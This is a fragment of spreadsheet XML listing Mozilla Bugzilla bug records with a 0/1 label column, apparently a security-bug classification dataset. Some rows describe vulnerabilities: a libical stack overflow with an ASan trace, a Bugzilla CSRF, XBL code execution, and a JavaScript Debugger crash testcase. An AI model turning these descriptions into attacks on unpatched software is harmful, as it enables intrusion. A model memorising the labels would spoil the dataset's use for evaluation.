[task 2020-07-23T17:19:54.089Z]  1:35.15 ============================= test session starts =============================
[task 2020-07-23T17:19:54.089Z]  1:35.15 platform win32 -- Python 3.6.5, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- Z:\task_1595523575\build\src\obj-x86_64-pc-mingw32\_virtualenvs\src-dXRY18kn-3\Scripts\python.exe
[task 2020-07-23T17:19:54.089Z]  1:35.15 rootdir: Z:\task_1595523575\build\src, inifile: Z:\task_1595523575\build\src\config\mozunit\mozunit\pytest.ini
[task 2020-07-23T17:19:54.090Z]  1:35.15 collecting ... collected 3 items
[task 2020-07-23T17:19:54.090Z]  1:35.15 
[task 2020-07-23T17:19:54.090Z]  1:35.15 tools/lint/test/test_eslint.py::test_lint_with_global_exclude[eslint] PASSED
[task 2020-07-23T17:19:54.090Z]  1:35.15 tools/lint/test/test_eslint.py::test_no_files_to_lint[eslint] PASSED
[task 2020-07-23T17:19:54.090Z]  1:35.15 tools/lint/test/test_eslint.py::test_bad_import[eslint] PASSED
[task 2020-07-23T17:19:54.090Z]  1:35.15 
[task 2020-07-23T17:19:54.090Z]  1:35.15 ========================== 3 passed in 38.80 seconds ==========================
[task 2020-07-23T17:19:54.092Z]  1:35.15 Return code from mach python-test: 1
[fetches 2020-07-23T17:19:54.217Z] removing Z:/task_1595523575/fetches
[fetches 2020-07-23T17:19:55.282Z] finished
[taskcluster 2020-07-23T17:19:55.304Z]    Exit Code: 1
[taskcluster 2020-07-23T17:19:55.304Z]    User Time: 0s
[taskcluster 2020-07-23T17:19:55.304Z]  Kernel Time: 15.625ms
[taskcluster 2020-07-23T17:19:55.304Z]    Wall Time: 8m40.1061638s
[taskcluster 2020-07-23T17:19:55.304Z]       Result: FAILED
[taskcluster 2020-07-23T17:19:55.304Z] === Task Finished ===
[taskcluster 2020-07-23T17:19:55.304Z] Task Duration: 8m40.1081166s
[taskcluster 2020-07-23T17:19:55.304Z] [mounts] Preserving cache: Moving "Z:\\task_1595523575\\build" to "Z:\\caches\\HhhQf8EqQGStgM6sE70Wmg"
[taskcluster 2020-07-23T17:19:55.519Z] [mounts] Denying task_1595523575 access to 'Z:\caches\HhhQf8EqQGStgM6sE70Wmg'
[taskcluster 2020-07-23T17:20:12.329Z] Uploading redirect artifact public/logs/live.log to URL https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/K4sRosN7T8SP8V7NSm99MQ/runs/0/artifacts/public/logs/live_backing.log with mime type "text/plain; charset=utf-8" and expiry 2021-07-23T17:10:45.740Z
[taskcluster:error] exit status 1
```</t>
        </is>
      </c>
      <c r="X4236" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4237">
      <c r="A4237" t="n">
        <v>484890</v>
      </c>
      <c r="B4237" t="inlineStr">
        <is>
          <t>2009-03-23 16:26:38 -0700</t>
        </is>
      </c>
      <c r="C4237" t="inlineStr">
        <is>
          <t>nsEditingSession.cpp uses InitWithFuncCallback in a suspicious way</t>
        </is>
      </c>
      <c r="D4237" t="inlineStr">
        <is>
          <t>2010-06-22 19:58:14 -0700</t>
        </is>
      </c>
      <c r="E4237" t="n">
        <v>1</v>
      </c>
      <c r="F4237" t="n">
        <v>1</v>
      </c>
      <c r="G4237" t="n">
        <v>3</v>
      </c>
      <c r="H4237" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4237" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4237" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K4237" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4237" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4237" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4237" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4237" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4237" t="inlineStr">
        <is>
          <t>[sg:critical?] [qa-noaction-191] [qa-noaction-192]</t>
        </is>
      </c>
      <c r="Q4237" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4237" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4237" t="inlineStr">
        <is>
          <t>mozilla1.9.3a4</t>
        </is>
      </c>
      <c r="T4237" t="n">
        <v>1</v>
      </c>
      <c r="U4237" t="n">
        <v>0</v>
      </c>
      <c r="V4237" t="n">
        <v>13</v>
      </c>
      <c r="W4237" t="inlineStr">
        <is>
          <t>http://mxr.mozilla.org/mozilla-central/source/editor/composer/src/nsEditingSession.cpp#1061
What keeps docShell alive?</t>
        </is>
      </c>
      <c r="X4237" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4238">
      <c r="A4238" t="n">
        <v>1403343</v>
      </c>
      <c r="B4238" t="inlineStr">
        <is>
          <t>2017-09-26 14:00:44 -0700</t>
        </is>
      </c>
      <c r="C4238" t="inlineStr">
        <is>
          <t>Pulse warning emails mention exchange "could not be determined"</t>
        </is>
      </c>
      <c r="D4238" t="inlineStr">
        <is>
          <t>2021-05-18 08:58:17 -0700</t>
        </is>
      </c>
      <c r="E4238" t="n">
        <v>1</v>
      </c>
      <c r="F4238" t="n">
        <v>1</v>
      </c>
      <c r="G4238" t="n">
        <v>4</v>
      </c>
      <c r="H4238" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4238" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J4238" t="inlineStr">
        <is>
          <t>Pulse</t>
        </is>
      </c>
      <c r="K4238" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4238" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4238" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4238" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4238" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4238" t="inlineStr">
        <is>
          <t>[lang=python]</t>
        </is>
      </c>
      <c r="Q4238" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R4238" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4238" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4238" t="n">
        <v>1</v>
      </c>
      <c r="U4238" t="n">
        <v>0</v>
      </c>
      <c r="V4238" t="n">
        <v>9</v>
      </c>
      <c r="W4238" t="inlineStr">
        <is>
          <t>Example:
Warning: your queue "queue/buildbot-bridge/log_uploaded" on exchange "could not be determined" is
overgrowing (3216 ready messages, 4001 total messages).
The queue will be automatically deleted when it exceeds 20000 messages.
Make sure your clients are running correctly and are cleaning up unused
durable queues.</t>
        </is>
      </c>
      <c r="X4238" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4239">
      <c r="A4239" t="n">
        <v>221526</v>
      </c>
      <c r="B4239" t="inlineStr">
        <is>
          <t>2003-10-07 15:27:24 -0700</t>
        </is>
      </c>
      <c r="C4239" t="inlineStr">
        <is>
          <t>JS Script.thaw is a security hole</t>
        </is>
      </c>
      <c r="D4239" t="inlineStr">
        <is>
          <t>2011-08-05 22:35:00 -0700</t>
        </is>
      </c>
      <c r="E4239" t="n">
        <v>1</v>
      </c>
      <c r="F4239" t="n">
        <v>1</v>
      </c>
      <c r="G4239" t="n">
        <v>3</v>
      </c>
      <c r="H4239" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4239" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4239" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4239" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4239" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4239" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4239" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4239" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4239" t="inlineStr"/>
      <c r="Q4239" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4239" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4239" t="inlineStr">
        <is>
          <t>mozilla1.5final</t>
        </is>
      </c>
      <c r="T4239" t="n">
        <v>1</v>
      </c>
      <c r="U4239" t="n">
        <v>0</v>
      </c>
      <c r="V4239" t="n">
        <v>19</v>
      </c>
      <c r="W4239" t="inlineStr">
        <is>
          <t>Script.thaw deserializes a script from a string.  You can then run the script. 
A savvy attacker who knows JS bytecode and engine internals, and the target
machine architecture, can call a native function!
Patch in a second.
/be</t>
        </is>
      </c>
      <c r="X4239" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4240">
      <c r="A4240" t="n">
        <v>1012694</v>
      </c>
      <c r="B4240" t="inlineStr">
        <is>
          <t>2014-05-19 07:56:12 -0700</t>
        </is>
      </c>
      <c r="C4240" t="inlineStr">
        <is>
          <t>Assertion failure: str1-&gt;length() == str2-&gt;length(), at jit/IonCaches.cpp:2955</t>
        </is>
      </c>
      <c r="D4240" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:24 -0700</t>
        </is>
      </c>
      <c r="E4240" t="n">
        <v>1</v>
      </c>
      <c r="F4240" t="n">
        <v>1</v>
      </c>
      <c r="G4240" t="n">
        <v>3</v>
      </c>
      <c r="H4240" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4240" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4240" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4240" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4240" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4240" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4240" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4240" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4240" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main31+][adv-esr24.7+]</t>
        </is>
      </c>
      <c r="Q4240" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4240" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4240" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T4240" t="n">
        <v>1</v>
      </c>
      <c r="U4240" t="n">
        <v>0</v>
      </c>
      <c r="V4240" t="n">
        <v>32</v>
      </c>
      <c r="W4240" t="inlineStr">
        <is>
          <t>Created attachment 8424853
Testcase for shell
The attached testcase asserts on mozilla-central revision 41a54c8add09 (run with --fuzzing-safe --ion-eager).</t>
        </is>
      </c>
      <c r="X4240" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4241">
      <c r="A4241" t="n">
        <v>1553808</v>
      </c>
      <c r="B4241" t="inlineStr">
        <is>
          <t>2019-05-23 05:57:16 -0700</t>
        </is>
      </c>
      <c r="C4241" t="inlineStr">
        <is>
          <t>Stack buffer overflow in icalrecur.c icalrecur_add_bydayrules</t>
        </is>
      </c>
      <c r="D4241" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:39 -0700</t>
        </is>
      </c>
      <c r="E4241" t="n">
        <v>1</v>
      </c>
      <c r="F4241" t="n">
        <v>1</v>
      </c>
      <c r="G4241" t="n">
        <v>2</v>
      </c>
      <c r="H4241" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4241" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J4241" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4241" t="inlineStr">
        <is>
          <t>Lightning 6.2</t>
        </is>
      </c>
      <c r="L4241" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4241" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4241" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4241" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4241" t="inlineStr"/>
      <c r="Q4241" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4241" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4241" t="inlineStr">
        <is>
          <t>6.2.7</t>
        </is>
      </c>
      <c r="T4241" t="n">
        <v>1</v>
      </c>
      <c r="U4241" t="n">
        <v>0</v>
      </c>
      <c r="V4241" t="n">
        <v>13</v>
      </c>
      <c r="W4241" t="inlineStr">
        <is>
          <t>Created attachment 9067023
stack-overflow-submit.eml
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Steps to reproduce:
Open the attached saved message (stack-overflow-submit.eml) in Thunderbird. Receiving this message in my inbox also triggers the bug without further user interaction. The thunderbird process is killed.
Actual results:
A stack buffer overflow happens when loading the attached file. An specially crafted text/calendar mail attachment triggers a stack buffer overflow write in icalrecur_add_bydayrules.
$ thunderbird stack-overflow-submit.eml 
[calBackendLoader] Using Thunderbird's builtin libical backend
*** stack smashing detected ***: &lt;unknown&gt; terminated
Aborted (core dumped
==4191==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff695fb968 at pc 0x00000051e8cb bp 0x7fff695fad50 sp 0x7fff695fad48
WRITE of size 2 at 0x7fff695fb968 thread T0
    #0 0x51e8ca in icalrecur_add_bydayrules /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalrecur.c:409:22
    #1 0x51f5b0 in icalrecurrencetype_from_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalrecur.c:481:6
    #2 0x535554 in icalvalue_new_from_string_with_error /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalvalue.c:615:11
    #3 0x519251 in icalparser_add_line /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1075:14
    #4 0x517e1b in icalparser_parse /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:623:11
    #5 0x4fd243 in icalparser_parse_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1236:9
    #6 0x4fa975 in LLVMFuzzerTestOneInput (/opt/libfuzzer/thunderbird_libical_fuzzer+0x4fa975)
    #7 0x43a681 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x43a681)
    #8 0x424327 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x424327)
    #9 0x42a4c1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x42a4c1)
    #10 0x453f62 in main (/opt/libfuzzer/thunderbird_libical_fuzzer+0x453f62)
    #11 0x7f85ccd8ab96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #12 0x41dc49 in _start (/opt/libfuzzer/thunderbird_libical_fuzzer+0x41dc49)
Address 0x7fff695fb968 is located in stack of thread T0 at offset 2824 in frame
    #0 0x51ed23 in icalrecurrencetype_from_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalrecur.c:420
  This frame has 2 object(s):
    [32, 2824) 'parser' (line 421) &lt;== Memory access at offset 2824 overflows this variable
    [2960, 3008) 'tmp' (line 462)
Expected results:
No stack overflow.</t>
        </is>
      </c>
      <c r="X4241" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4242">
      <c r="A4242" t="n">
        <v>708541</v>
      </c>
      <c r="B4242" t="inlineStr">
        <is>
          <t>2011-12-08 00:37:17 -0800</t>
        </is>
      </c>
      <c r="C4242" t="inlineStr">
        <is>
          <t>Reimage linux64-ix-slave02</t>
        </is>
      </c>
      <c r="D4242" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4242" t="n">
        <v>1</v>
      </c>
      <c r="F4242" t="n">
        <v>1</v>
      </c>
      <c r="G4242" t="n">
        <v>5</v>
      </c>
      <c r="H4242" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4242" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4242" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4242" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4242" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4242" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4242" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4242" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4242" t="inlineStr">
        <is>
          <t>[buildduty]</t>
        </is>
      </c>
      <c r="Q4242" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4242" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4242" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4242" t="n">
        <v>1</v>
      </c>
      <c r="U4242" t="n">
        <v>0</v>
      </c>
      <c r="V4242" t="n">
        <v>3</v>
      </c>
      <c r="W4242" t="inlineStr">
        <is>
          <t>Please reimage linux64-ix-slave02.build.m.o, which has been off on loan to a developer.</t>
        </is>
      </c>
      <c r="X4242" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4243">
      <c r="A4243" t="n">
        <v>725663</v>
      </c>
      <c r="B4243" t="inlineStr">
        <is>
          <t>2012-02-09 07:49:31 -0800</t>
        </is>
      </c>
      <c r="C4243" t="inlineStr">
        <is>
          <t>[SECURITY] CSRF vulnerability in the XML-RPC API when using mod_perl</t>
        </is>
      </c>
      <c r="D4243" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:32 -0700</t>
        </is>
      </c>
      <c r="E4243" t="n">
        <v>1</v>
      </c>
      <c r="F4243" t="n">
        <v>1</v>
      </c>
      <c r="G4243" t="n">
        <v>4</v>
      </c>
      <c r="H4243" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4243" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4243" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K4243" t="inlineStr">
        <is>
          <t>4.0.2</t>
        </is>
      </c>
      <c r="L4243" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4243" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4243" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4243" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4243" t="inlineStr">
        <is>
          <t>[Bugzilla 4.0.1 and older not affected]</t>
        </is>
      </c>
      <c r="Q4243" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4243" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4243" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T4243" t="n">
        <v>1</v>
      </c>
      <c r="U4243" t="n">
        <v>0</v>
      </c>
      <c r="V4243" t="n">
        <v>44</v>
      </c>
      <c r="W4243" t="inlineStr">
        <is>
          <t>Created attachment 595740
PoC.html
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.7 Safari/535.19
Steps to reproduce:
Hello,
There is a CSRF vulnerability in Bugzilla XML-RPC. The vulnerability allows an attacker to make alterations to a bug, groups, etc.. The vulnerability is due to non-implementation of security tokens, thus allowing you to make HTTP requests, bugs and making alterations in groups.
Reproduce:
1. Log in  https://landfill.bugzilla.org/bugzilla-tip.
2. Open PoC.html
3. See the XML response.
4. Back to https://landfill.bugzilla.org/bugzilla-tip
4. See you logouted.
Note: My PoC only make the user logged be logout.
Cheers,
Mario.</t>
        </is>
      </c>
      <c r="X4243" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4244">
      <c r="A4244" t="n">
        <v>863933</v>
      </c>
      <c r="B4244" t="inlineStr">
        <is>
          <t>2013-04-19 17:10:45 -0700</t>
        </is>
      </c>
      <c r="C4244" t="inlineStr">
        <is>
          <t>Arbitrary code execution via XBL</t>
        </is>
      </c>
      <c r="D4244" t="inlineStr">
        <is>
          <t>2024-05-30 08:02:14 -0700</t>
        </is>
      </c>
      <c r="E4244" t="n">
        <v>1</v>
      </c>
      <c r="F4244" t="n">
        <v>1</v>
      </c>
      <c r="G4244" t="n">
        <v>3</v>
      </c>
      <c r="H4244" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4244" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4244" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K4244" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4244" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4244" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4244" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4244" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4244" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q4244" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4244" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4244" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4244" t="n">
        <v>1</v>
      </c>
      <c r="U4244" t="n">
        <v>0</v>
      </c>
      <c r="V4244" t="n">
        <v>18</v>
      </c>
      <c r="W4244" t="inlineStr">
        <is>
          <t>It is possible to compile a user-defined function in the XBL scope of a "marquee" element -- using |_setEventListener| method. Once the defined event is triggered, the code running in the XBL scope can access all content protected by System Only Wrapper. It can also open arbitrary chrome-privileged pages.
Additionally, remote web content can access privileged methods from property descriptor objects on Chrome Object Wrappers fetched off of an XBL scope. They can be subsequently used to perform a cross-site scripting attack on a frame with a privileged page, which allows drive-by download of malware.</t>
        </is>
      </c>
      <c r="X4244" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4245">
      <c r="A4245" t="n">
        <v>535926</v>
      </c>
      <c r="B4245" t="inlineStr">
        <is>
          <t>2009-12-18 20:07:08 -0800</t>
        </is>
      </c>
      <c r="C4245" t="inlineStr">
        <is>
          <t>"ASSERTION: This is unsafe" with &lt;iframe&gt;, XBL</t>
        </is>
      </c>
      <c r="D4245" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4245" t="n">
        <v>1</v>
      </c>
      <c r="F4245" t="n">
        <v>1</v>
      </c>
      <c r="G4245" t="n">
        <v>3</v>
      </c>
      <c r="H4245" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4245" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4245" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4245" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4245" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4245" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4245" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4245" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4245" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4245" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4245" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4245" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4245" t="n">
        <v>1</v>
      </c>
      <c r="U4245" t="n">
        <v>0</v>
      </c>
      <c r="V4245" t="n">
        <v>46</v>
      </c>
      <c r="W4245" t="inlineStr">
        <is>
          <t>Created attachment 418470
testcase
###!!! ASSERTION: This is unsafe!: 'Error', file /Users/jruderman/mozilla-central/content/events/src/nsEventDispatcher.cpp, line 485
This is the assertion just added in bug 531176.
I'm not sure why I need the setTimeout.</t>
        </is>
      </c>
      <c r="X4245" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4246">
      <c r="A4246" t="n">
        <v>1586762</v>
      </c>
      <c r="B4246" t="inlineStr">
        <is>
          <t>2019-10-07 06:53:03 -0700</t>
        </is>
      </c>
      <c r="C4246" t="inlineStr">
        <is>
          <t>Crash [@ ??] with Debugger</t>
        </is>
      </c>
      <c r="D4246" t="inlineStr">
        <is>
          <t>2022-01-10 05:36:21 -0800</t>
        </is>
      </c>
      <c r="E4246" t="n">
        <v>1</v>
      </c>
      <c r="F4246" t="n">
        <v>1</v>
      </c>
      <c r="G4246" t="n">
        <v>3</v>
      </c>
      <c r="H4246" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4246" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4246" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4246" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4246" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4246" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4246" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4246" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4246" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q4246" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4246" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4246" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T4246" t="n">
        <v>1</v>
      </c>
      <c r="U4246" t="n">
        <v>0</v>
      </c>
      <c r="V4246" t="n">
        <v>8</v>
      </c>
      <c r="W4246" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 4a20e73bd624 (build with --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --ion-offthread-compile=off):
    setJitCompilerOption("baseline.warmup.trigger", 0);
    var g81 = newGlobal({
        newCompartment: true
    });
    var dbg = new Debugger;
    dbg.addDebuggee(g81);
    g81.eval("" + function f41() {});
    dbg.onEnterFrame = function(f41) {
        dbg.removeDebuggee(g81);
    }
    g81.f41();
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    0x00003fa8c55b221f in ?? ()
    #0  0x00003fa8c55b221f in ?? ()
    #1  0x00001f98159d30a0 in ?? ()
    #2  0x00007ffff477eea1 in ?? ()
    #3  0x0000000000000000 in ?? ()
    rax	0x1f98159d30a0	34738058113184
    rbx	0x0	0
    rcx	0xfffe1f98159bc070	-528211895402384
    rdx	0x0	0
    rsi	0x8	8
    rdi	0x0	0
    rbp	0x7fffffffbbf8	140737488337912
    rsp	0x7fffffffbbb8	140737488337848
    r8	0x0	0
    r9	0x7ffff5f41108	140737319801096
    r10	0x1b	27
    r11	0x246	582
    r12	0x8	8
    r13	0x7fffffffc4d8	140737488340184
    r14	0x7ffff477eea1	140737294888609
    r15	0x7fffffffbcf0	140737488338160
    rip	0x3fa8c55b221f	69994098139679
    =&gt; 0x3fa8c55b221f:	mov    (%rdi),%rdi
       0x3fa8c55b2222:	callq  *(%rdi)</t>
        </is>
      </c>
      <c r="X4246" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4247">
      <c r="A4247" t="n">
        <v>1692655</v>
      </c>
      <c r="B4247" t="inlineStr">
        <is>
          <t>2021-02-12 22:57:29 -0800</t>
        </is>
      </c>
      <c r="C4247" t="inlineStr">
        <is>
          <t>SameSite cookie bypass when using history navigation via a window reference to reload reader mode page containing a meta redirect</t>
        </is>
      </c>
      <c r="D4247" t="inlineStr">
        <is>
          <t>2024-05-30 10:27:36 -0700</t>
        </is>
      </c>
      <c r="E4247" t="n">
        <v>1</v>
      </c>
      <c r="F4247" t="n">
        <v>1</v>
      </c>
      <c r="G4247" t="n">
        <v>3</v>
      </c>
      <c r="H4247" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4247" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4247" t="inlineStr">
        <is>
          <t>Reader Mode</t>
        </is>
      </c>
      <c r="K4247" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
